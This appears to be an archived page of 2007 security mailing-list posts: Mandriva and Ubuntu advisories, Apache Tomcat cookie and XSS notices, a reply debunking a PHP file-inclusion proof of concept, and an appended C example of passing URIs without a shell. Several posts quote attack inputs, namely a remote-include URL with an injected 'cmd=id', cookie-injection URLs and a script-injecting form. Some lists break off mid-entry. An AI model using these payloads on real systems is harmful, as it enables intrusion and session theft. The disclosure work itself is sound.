[ MDKSA-2007:159 ] - Updated gpdf packages fix vulnerability

2007-08-14 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:159
 http://www.mandriva.com/security/
 ___
 
 Package : gpdf
 Date: August 13, 2007
 Affected: Corporate 3.0
 ___
 
 Problem Description:
 
 Maurycy Prodeus found an integer overflow vulnerability in the way
 various PDF viewers processed PDF files.  An attacker could create
 a malicious PDF file that could cause gpdf to crash and possibly
 execute arbitrary code upon a user opening the file.
 
 This update provides packages which are patched to prevent these
 issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 4cd42c64b35c4eccdcb85de2a0889876  
corporate/3.0/i586/gpdf-0.112-2.8.C30mdk.i586.rpm 
 5eaf44a638c77c2b6b9f99c81a8bd00a  
corporate/3.0/SRPMS/gpdf-0.112-2.8.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 a994aae5759655c0b8dffa064c5f83a8  
corporate/3.0/x86_64/gpdf-0.112-2.8.C30mdk.x86_64.rpm 
 5eaf44a638c77c2b6b9f99c81a8bd00a  
corporate/3.0/SRPMS/gpdf-0.112-2.8.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGwM1tmqjQ0CJFipgRAolJAKC/iV/5iLoYDqPdKiC0GLwIimv12gCeKNeQ
eWAqWhjy8op4OcX/HcXsVLc=
=D53g
-END PGP SIGNATURE-



PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit)

2007-08-14 Thread Emanuele Gentili
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Exploit is attached.

E.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwRXDmErIuzAYjw8RApkJAKCkxFrH2XmwTS37D0B8BmaFe47EkwCgs5Uc
6XtVfkHyqOVv51uylzwT3WQ=
=49Nv
-END PGP SIGNATURE-



egs-fuckphpbluedragon300.pl
Description: Perl program


Re: PHPCentral Login Script Remote Command Execution Vulnerability

2007-08-14 Thread Magnus Holmgren
On Sunday 12 August 2007 17:12, [EMAIL PROTECTED] wrote:
 include.php ;

 Lines 4 ;

 include("".$_SERVER["DOCUMENT_ROOT"]."/$folder/config.php");

 PoC :

 http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?;cmd=id

*Of course* this does not work. Setting register_globals to On causes the 
contents of the superglobals ($_SERVER, $_GET, $_COOKIES, etc.) to be 
registered in the global variable namespace. But the superglobals 
*themselves* are special. They shadow everything - you cannot define your own 
$_SERVER array, nor can it be overridden with HTTP GET or POST values. If 
that were possible, using the superglobals would be useless; all scripts 
would be vulnerable unless register_globals is off.

PoC:
echo '$_SERVER[DOCUMENT_ROOT] = ', $_SERVER["DOCUMENT_ROOT"], "<br/>";
echo '$_GET[_SERVER][DOCUMENT_ROOT] = ', $_GET["_SERVER"]["DOCUMENT_ROOT"], "<br/>";

Outputs:
$_SERVER[DOCUMENT_ROOT] = /home/www/docs
$_GET[_SERVER][DOCUMENT_ROOT] = /foo

If the query string is _SERVER[DOCUMENT_ROOT]=/foo

=

Now, register_globals has defaulted to off ever since PHP 4.2.0. I think it 
would be fair to let PHP scripts rely on this, and not consider all scripts 
that don't initialize their variables as vulnerable unless they require 
register_globals to be on (this is not to say that it's not a good idea to 
initialize variables).

And it would of course be nice if people posting to Bugtraq actually tested 
their PoCs first. Can't the moderator spot obvious cases like this, or are 
all vaguely relevant posts accepted, potentially for public ridicule?

-- 
Magnus Holmgren[EMAIL PROTECTED]




[ MDKSA-2007:161 ] - Updated poppler packages fix vulnerability

2007-08-14 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:161
 http://www.mandriva.com/security/
 ___
 
 Package : poppler
 Date: August 13, 2007
 Affected: 2007.0, 2007.1, Corporate 4.0
 ___
 
 Problem Description:
 
 Maurycy Prodeus found an integer overflow vulnerability in the way
 various PDF viewers processed PDF files.  An attacker could create
 a malicious PDF file that could cause poppler to crash and possibly
 execute arbitrary code upon a user opening the file.
 
 This update provides packages which are patched to prevent these
 issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 ff1a936825b13adf6e0d244d0128efa4  
2007.0/i586/libpoppler-qt1-0.5.3-5.3mdv2007.0.i586.rpm
 9d28c724d9e3913761fa1d0528cb7cb8  
2007.0/i586/libpoppler-qt1-devel-0.5.3-5.3mdv2007.0.i586.rpm
 fa4b5cf01b38c572d741ef08fe04b293  
2007.0/i586/libpoppler-qt4-1-0.5.3-5.3mdv2007.0.i586.rpm
 e35a3598cbc0f29c4c21e675e6391ff3  
2007.0/i586/libpoppler-qt4-1-devel-0.5.3-5.3mdv2007.0.i586.rpm
 1702a9c16e72fe89f9aa1b78ff6055b5  
2007.0/i586/libpoppler1-0.5.3-5.3mdv2007.0.i586.rpm
 0f1f330e28674ce2e67e56f3614b4d2c  
2007.0/i586/libpoppler1-devel-0.5.3-5.3mdv2007.0.i586.rpm
 b619db3ef9b9545adf9f864f2972db97  
2007.0/i586/poppler-0.5.3-5.3mdv2007.0.i586.rpm 
 9a311578c1933c8ec6ddb2f8b4e93445  
2007.0/SRPMS/poppler-0.5.3-5.3mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 c8b111069fa66ce0682dacf1e3de01f9  
2007.0/x86_64/lib64poppler-qt1-0.5.3-5.3mdv2007.0.x86_64.rpm
 7434c137fd66482914aa6996f1aae55c  
2007.0/x86_64/lib64poppler-qt1-devel-0.5.3-5.3mdv2007.0.x86_64.rpm
 1b01f4d5f77ce2f08f09ca942c409b60  
2007.0/x86_64/lib64poppler-qt4-1-0.5.3-5.3mdv2007.0.x86_64.rpm
 cbc85b288f7e0e35a3c97c0e3731e6ef  
2007.0/x86_64/lib64poppler-qt4-1-devel-0.5.3-5.3mdv2007.0.x86_64.rpm
 db95938d3c09131729b80a7283d359c9  
2007.0/x86_64/lib64poppler1-0.5.3-5.3mdv2007.0.x86_64.rpm
 ccc128242680e5f90fb49026b83daa04  
2007.0/x86_64/lib64poppler1-devel-0.5.3-5.3mdv2007.0.x86_64.rpm
 714996d0cc629e62649360749a9050f0  
2007.0/x86_64/poppler-0.5.3-5.3mdv2007.0.x86_64.rpm 
 9a311578c1933c8ec6ddb2f8b4e93445  
2007.0/SRPMS/poppler-0.5.3-5.3mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 2ef41e36faff21f62fbec2bf89e7b6f1  
2007.1/i586/libpoppler-qt1-0.5.4-3.2mdv2007.1.i586.rpm
 377e85d2c599a82f3871f138494f322c  
2007.1/i586/libpoppler-qt1-devel-0.5.4-3.2mdv2007.1.i586.rpm
 a3219588e17b2cc3189e5395ec5dd475  
2007.1/i586/libpoppler-qt4-1-0.5.4-3.2mdv2007.1.i586.rpm
 81344c8e3eb0437559e3e5c0eac62631  
2007.1/i586/libpoppler-qt4-1-devel-0.5.4-3.2mdv2007.1.i586.rpm
 b78ab182aac571c2a99fae0a5d470927  
2007.1/i586/libpoppler1-0.5.4-3.2mdv2007.1.i586.rpm
 87893636c37eb5db131127f89695df0f  
2007.1/i586/libpoppler1-devel-0.5.4-3.2mdv2007.1.i586.rpm
 6ff7146293ee8aec15574d4aa89d6a2f  
2007.1/i586/poppler-0.5.4-3.2mdv2007.1.i586.rpm 
 87111ab66842ea16932e76614932f024  
2007.1/SRPMS/poppler-0.5.4-3.2mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 6739512a718b2ba794d33c567703f9ad  
2007.1/x86_64/lib64poppler-qt1-0.5.4-3.2mdv2007.1.x86_64.rpm
 37b8f40a836b910455ed43a252303dc7  
2007.1/x86_64/lib64poppler-qt1-devel-0.5.4-3.2mdv2007.1.x86_64.rpm
 747be5e90c821630dd349ba16ef698b4  
2007.1/x86_64/lib64poppler-qt4-1-0.5.4-3.2mdv2007.1.x86_64.rpm
 153745ad2a655b8e1262c82ae1fc70a4  
2007.1/x86_64/lib64poppler-qt4-1-devel-0.5.4-3.2mdv2007.1.x86_64.rpm
 b59db62be7a4d73a8f0de227da0d5354  
2007.1/x86_64/lib64poppler1-0.5.4-3.2mdv2007.1.x86_64.rpm
 47541453858a863a482a316cf14d56b6  
2007.1/x86_64/lib64poppler1-devel-0.5.4-3.2mdv2007.1.x86_64.rpm
 9ac6efa64431cf7144e77375ba90769b  
2007.1/x86_64/poppler-0.5.4-3.2mdv2007.1.x86_64.rpm 
 87111ab66842ea16932e76614932f024  
2007.1/SRPMS/poppler-0.5.4-3.2mdv2007.1.src.rpm

 Corporate 4.0:
 f8b99d883919ba20e7f46aa71448edb5  
corporate/4.0/i586/libpoppler-qt0-0.4.1-3.5.20060mlcs4.i586.rpm
 89e37529b304258acd4999c5fbfadec7  
corporate/4.0/i586/libpoppler-qt0-devel-0.4.1-3.5.20060mlcs4.i586.rpm
 97b9de6aa6c6617c21b7e9bbea3a517b  
corporate/4.0/i586/libpoppler0-0.4.1-3.5.20060mlcs4.i586.rpm
 94232bb5dad116fdd2a4b342c7205eb3  
corporate/4.0/i586/libpoppler0-devel-0.4.1-3.5.20060mlcs4.i586.rpm 
 45ba9d12e59c1cbb4aae41988d5983c3  
corporate/4.0/SRPMS/poppler-0.4.1-3.5.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 4ee1af44c82311a075abd9bec021935c  
corporate/4.0/x86_64/lib64poppler-qt0-0.4.1-3.5.20060mlcs4.x86_64.rpm
 53fbebb09587d1949951ad4a9d6a9eab  
corporate/4.0/x86_64/lib64poppler-qt0-devel-0.4.1-3.5.20060mlcs4.x86_64.rpm
 2153b37ce8cd3a29bbf6d31a68a50558  

[ MDKSA-2007:160 ] - Updated pdftohtml packages fix vulnerability

2007-08-14 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:160
 http://www.mandriva.com/security/
 ___
 
 Package : pdftohtml
 Date: August 13, 2007
 Affected: 2007.0, 2007.1
 ___
 
 Problem Description:
 
 Maurycy Prodeus found an integer overflow vulnerability in the way
 various PDF viewers processed PDF files.  An attacker could create a
 malicious PDF file that could cause pdftohtml to crash and possibly
 execute arbitrary code upon a user opening the file.
 
 This update provides packages which are patched to prevent these
 issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 4592a1f7115b10ad63444f4573a30365  
2007.0/i586/pdftohtml-0.36-5.2mdv2007.0.i586.rpm 
 ed0f9331d0f7042c9ef0df41d28c1e69  
2007.0/SRPMS/pdftohtml-0.36-5.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 686d03f528d949957ff5884bb505d762  
2007.0/x86_64/pdftohtml-0.36-5.2mdv2007.0.x86_64.rpm 
 ed0f9331d0f7042c9ef0df41d28c1e69  
2007.0/SRPMS/pdftohtml-0.36-5.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 66426070761def5ae0ee9f6f1b174a46  
2007.1/i586/pdftohtml-0.39-1.1mdv2007.1.i586.rpm 
 17a547b0f2d2fecc5800083143dc730f  
2007.1/SRPMS/pdftohtml-0.39-1.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 2d572fa290a490bbcaff73898c95a2af  
2007.1/x86_64/pdftohtml-0.39-1.1mdv2007.1.x86_64.rpm 
 17a547b0f2d2fecc5800083143dc730f  
2007.1/SRPMS/pdftohtml-0.39-1.1mdv2007.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGwNFrmqjQ0CJFipgRAv2IAKDb0IHMGzNZATBqmDVKH6QoVioH7ACfX46t
fDzt568B5Q6htUhoJ1ihjdo=
=acIA
-END PGP SIGNATURE-



CVE-2007-3382: Handling of cookies containing a ' character

2007-08-14 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2007-3382: Handling of cookies containing a ' character

Severity:
Low (Session Hi-jacking)

Vendor:
The Apache Software Foundation

Versions Affected:
6.0.0 to 6.0.13
5.5.0 to 5.5.24
5.0.0 to 5.0.30
4.1.0 to 4.1.36
3.3 to 3.3.2

Description:
Tomcat incorrectly treats a single quote character (') in a cookie
value as a delimiter. In some circumstances this can lead to the
leaking of information such as session ID to an attacker.

Mitigation:
Upgrade to 6.0.14

Credit:
This issue was discovered by Tomasz Kuczynski, Poznan Supercomputing
and Networking Center, who worked with the CERT/CC to report the
vulnerability.

Example:
http://localost:8080/servlets-examples/servlet/CookieExample?cookiename=BLOCKER&cookievalue=%5C%22A%3D%27%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2Fservlets-examples%2Fservlet+%3B

References:
http://tomcat.apache.org/security.html

Mark Thomas


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwSFVb7IeiTPGAkMRAjkwAKDnu+C08WRZazmZfzunFeHcitsvnACg3CtP
6c6FCxbFOcfxhqqayg8kdUI=
=MkDj
-END PGP SIGNATURE-


[ MDKSA-2007:158 ] - Updated xpdf packages fix vulnerability

2007-08-14 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:158
 http://www.mandriva.com/security/
 ___
 
 Package : xpdf
 Date: August 13, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 Maurycy Prodeus found an integer overflow vulnerability in the way
 various PDF viewers processed PDF files.  An attacker could create
 a malicious PDF file that could cause xpdf to crash and possibly
 execute arbitrary code upon a user opening the file.
 
 This update provides packages which are patched to prevent these
 issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 269758a101a0b173a5cf5d77969b84e4  
2007.0/i586/xpdf-3.01pl2-3.2mdv2007.0.i586.rpm
 f716a25908b7c51f83fc6ed2e6c430e5  
2007.0/i586/xpdf-tools-3.01pl2-3.2mdv2007.0.i586.rpm 
 a7ec337f6981c4e7f7397cff5172d6f7  
2007.0/SRPMS/xpdf-3.01pl2-3.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 b79a710e2f13d81dc23be17ea24373d7  
2007.0/x86_64/xpdf-3.01pl2-3.2mdv2007.0.x86_64.rpm
 3b0bf52479044b0f90bef43c9a47d916  
2007.0/x86_64/xpdf-tools-3.01pl2-3.2mdv2007.0.x86_64.rpm 
 a7ec337f6981c4e7f7397cff5172d6f7  
2007.0/SRPMS/xpdf-3.01pl2-3.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 e6d43c42af665f665a053e879382d487  2007.1/i586/xpdf-3.02-1.2mdv2007.1.i586.rpm
 801976970dbb5dc4bbe5383e285a5a47  
2007.1/i586/xpdf-tools-3.02-1.2mdv2007.1.i586.rpm 
 1ffa2c61b74cff6dc6d63d1b639e3a7d  2007.1/SRPMS/xpdf-3.02-1.2mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 b7232e0c216fab5c3cf0d79e6fe8556f  
2007.1/x86_64/xpdf-3.02-1.2mdv2007.1.x86_64.rpm
 ccb70220cf4155dbe199e7740c1a706a  
2007.1/x86_64/xpdf-tools-3.02-1.2mdv2007.1.x86_64.rpm 
 1ffa2c61b74cff6dc6d63d1b639e3a7d  2007.1/SRPMS/xpdf-3.02-1.2mdv2007.1.src.rpm

 Corporate 3.0:
 fd898bc3b8e3ad116afdbe2830151e78  
corporate/3.0/i586/xpdf-3.00-5.10.C30mdk.i586.rpm 
 19c11694c9485188559e4d53780e89bf  
corporate/3.0/SRPMS/xpdf-3.00-5.10.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 4836903f1fcc94dc36b726d54e81a5df  
corporate/3.0/x86_64/xpdf-3.00-5.10.C30mdk.x86_64.rpm 
 19c11694c9485188559e4d53780e89bf  
corporate/3.0/SRPMS/xpdf-3.00-5.10.C30mdk.src.rpm

 Corporate 4.0:
 2cfc84f609c24cbca54f5d7209c0afb1  
corporate/4.0/i586/xpdf-3.01-1.4.20060mlcs4.i586.rpm 
 95fd53a24bf1c773dc3925a68b51e01b  
corporate/4.0/SRPMS/xpdf-3.01-1.4.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 b88cfde5131adf97fc654b8772fb638b  
corporate/4.0/x86_64/xpdf-3.01-1.4.20060mlcs4.x86_64.rpm 
 95fd53a24bf1c773dc3925a68b51e01b  
corporate/4.0/SRPMS/xpdf-3.01-1.4.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGwM0emqjQ0CJFipgRAu3vAKDmsiefFpqDx6azTsk+bf6bjpIEEQCeIaMz
WGhfTpiOik4jsvYLU0N5Xxo=
=yMmF
-END PGP SIGNATURE-



CVE-2007-3385: Handling of \ in cookies

2007-08-14 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2007-3385: Handling of \ in cookies

Severity:
Low (Session Hi-jacking)

Vendor:
The Apache Software Foundation

Versions Affected:
6.0.0 to 6.0.13
5.5.0 to 5.5.24
5.0.0 to 5.0.30
4.1.0 to 4.1.36
3.3 to 3.3.2

Description:
Tomcat incorrectly handles the character sequence \ in a cookie
value. In some circumstances this can lead to the leaking of
information such as session ID to an attacker.

Mitigation:
Upgrade to 6.0.14

Credit:
This issue was discovered by Tomasz Kuczynski, Poznan Supercomputing
and Networking Center, who worked with the CERT/CC to report the
vulnerability.

Example:
http://localhost:8080/examples/servlets/servlet/CookieExample?cookiename=HAHA&cookievalue=%5C%22FOO%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2F%3B

References:
http://tomcat.apache.org/security.html


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwSFlb7IeiTPGAkMRArdPAJ99AXYzSterU7oG+u8UrtQAd2lTZwCbBK2R
hwRixKaYOwWyj5kD+fLT1ls=
=hgTP
-END PGP SIGNATURE-


CVE-2007-3386: XSS in Host Manager

2007-08-14 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2007-3386: XSS in Host Manager

Severity:
Low (Cross-site scripting)

Vendor:
The Apache Software Foundation

Versions Affected:
6.0.0 to 6.0.13
5.5.0 to 5.5.24

Description:
The Host Manager Servlet does not filter user supplied data before
display. This enables an XSS attack.

Mitigation:
Log out (close browser) of the Host Manager application once admin
tasks are complete
Upgrade to 6.0.14

Credit:
This issue was discovered by the NTT OSS CENTER who worked with the
JPCERT/CC to report the vulnerability.

Example:
<form action="http://localhost:8080/host-manager/html/add" method="get">
<input type="hidden" NAME='name' VALUE="aaa">
<input type="hidden" NAME='aliases' VALUE="<script>alert()</script>">
<input type="submit">
</form>

References:
http://tomcat.apache.org/security.html


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwSFyb7IeiTPGAkMRAlgMAKCe0hS+c6so9pxK3KfN7LggWv+3uQCfUsAg
95+vMfHDJlrKHP/yKUZ0SYc=
=1pQc
-END PGP SIGNATURE-


[USN-497-1] xfce4-terminal vulnerability

2007-08-14 Thread Kees Cook
=== 
Ubuntu Security Notice USN-497-1            August 14, 2007
xfce4-terminal vulnerability
CVE-2007-3770
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  xfce4-terminal   0.2.5+r21674-0ubuntu2.1

Ubuntu 6.10:
  xfce4-terminal   0.2.5.4-0ubuntu2.1

Ubuntu 7.04:
  xfce4-terminal   0.2.6-0ubuntu3.1

After a standard system upgrade you need to restart your session to
effect the necessary changes.

Details follow:

Lasse Kärkkäinen discovered that the Xfce Terminal did not correctly
escape shell meta-characters during Open Link actions.  If a remote
attacker tricked a user into opening a specially crafted URI, they could
execute arbitrary commands with the user's privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1.diff.gz
  Size/MD5: 7892 902a748e0c0fe963aed9f62d7492247c

http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1.dsc
  Size/MD5:  982 7ab2af378e2db311101541887b3d899f

http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674.orig.tar.gz
  Size/MD5:  1719502 202f3d5364127ee2cd3434e7fecad5d2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1_amd64.deb
  Size/MD5:  1005574 5b196f5dc586000452233f215248423b

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1_i386.deb
  Size/MD5:   998716 7476e02c550b2876da957249e126ba91

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1_powerpc.deb
  Size/MD5:  1002380 eec3f73feb99b58aaef302ffa0cf24b8

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1_sparc.deb
  Size/MD5:  1000628 822e33229ad34eb7703051a8ea3eab88

Updated packages for Ubuntu 6.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1.diff.gz
  Size/MD5: 7764 6759a5320fc94d1c95d2fd68dbbf974d

http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1.dsc
  Size/MD5:  967 5556541b5e806d77a068018609d97674

http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4.orig.tar.gz
  Size/MD5:  1914192 858ff414d46c2bdd695da3874ef01090

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1_amd64.deb
  Size/MD5:  1010080 607dc6c46565dac2cfa378134e5d91e2

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1_i386.deb
  Size/MD5:  1004880 343ed30f5a69e7caeb081269c7300b31

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1_powerpc.deb
  Size/MD5:  1006248 2c3e3ff2ceb6711f055b4e1af3c28607

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1_sparc.deb
  Size/MD5:  1004086 b7744640ce68f8f8d8763dee3414ffb8

Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6-0ubuntu3.1.diff.gz
  Size/MD5: 8617 2ed6e7705918937831599b2c3d366777

http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6-0ubuntu3.1.dsc
  Size/MD5: 1043 435a5294f568d44abbd907bec892e50e

http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6.orig.tar.gz
  Size/MD5:  1989139 c93cc68cc7656dfcb57118a999b79242

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6-0ubuntu3.1_amd64.deb
  Size/MD5:  1014248 8af1dd3b37a96344c3a892de94745867

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6-0ubuntu3.1_i386.deb
  Size/MD5:  1008944 a3e14fefeecbc2b3128652b809c5a27a

  powerpc architecture 
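
The fix class the notice describes (stop letting a URI reach a shell unescaped) is easiest to see side by side with the safe alternative: pass the URI as its own argv element so no shell ever parses it. The following is an added example written for this page; it is not code from the Ubuntu notice or from Xfce Terminal. It assumes a POSIX system with posix_spawnp and an echo binary on PATH; the function names and the sample URI are this example's own.

```c
#define _GNU_SOURCE
#include <spawn.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Characters /bin/sh would interpret if the URI were spliced into a command
   line.  Several of them (? & # *) are legal in URIs, which is why "escape
   before handing to the shell" is fragile and avoiding the shell is better.
   Defence-in-depth check only; hypothetical name for this example. */
int uri_needs_shell_escaping(const char *uri)
{
    return strpbrk(uri, ";|&`$()<>\"'\\ \t\n*?[]{}~#") != NULL;
}

/*
 * Hand the URI to a helper program as its own argv element, no shell in
 * between, and capture the helper's stdout.  Whatever the URI contains is
 * delivered to the helper as one literal argument.  Returns the number of
 * bytes captured or -1 on failure.
 */
ssize_t run_helper_with_uri(const char *helper, const char *uri,
                            char *out, size_t outlen)
{
    char *argv[] = { (char *)helper, (char *)uri, NULL };
    posix_spawn_file_actions_t fa;
    int fds[2];
    pid_t pid;
    ssize_t total = 0, n;

    if (pipe(fds) != 0)
        return -1;
    posix_spawn_file_actions_init(&fa);
    posix_spawn_file_actions_adddup2(&fa, fds[1], STDOUT_FILENO);
    posix_spawn_file_actions_addclose(&fa, fds[0]);
    posix_spawn_file_actions_addclose(&fa, fds[1]);
    if (posix_spawnp(&pid, helper, &fa, NULL, argv, environ) != 0) {
        posix_spawn_file_actions_destroy(&fa);
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    posix_spawn_file_actions_destroy(&fa);
    close(fds[1]);
    while (total < (ssize_t)outlen - 1 &&
           (n = read(fds[0], out + total, outlen - 1 - total)) > 0)
        total += n;
    out[total] = '\0';
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return total;
}

/* Demonstration: run "echo <uri>" through the argv path and check that the
   URI came out byte for byte, meta-characters included, i.e. nothing was
   interpreted on the way.  Returns 1 on a verbatim match. */
int uri_passes_through_verbatim(const char *uri)
{
    char out[512];
    ssize_t n = run_helper_with_uri("echo", uri, out, sizeof out);
    size_t ulen = strlen(uri);

    return n == (ssize_t)(ulen + 1) && memcmp(out, uri, ulen) == 0 &&
           out[ulen] == '\n';
}

int main(void)
{
    /* Constructed sample: a URI carrying several shell meta-characters. */
    const char *uri = "http://example.test/x.html?a=1&b=2;echo%20`id`";
    printf("needs escaping for a shell: %s\n",
           uri_needs_shell_escaping(uri) ? "yes" : "no");
    printf("arrives verbatim via argv:  %s\n",
           uri_passes_through_verbatim(uri) ? "yes" : "no");
    return 0;
}
```

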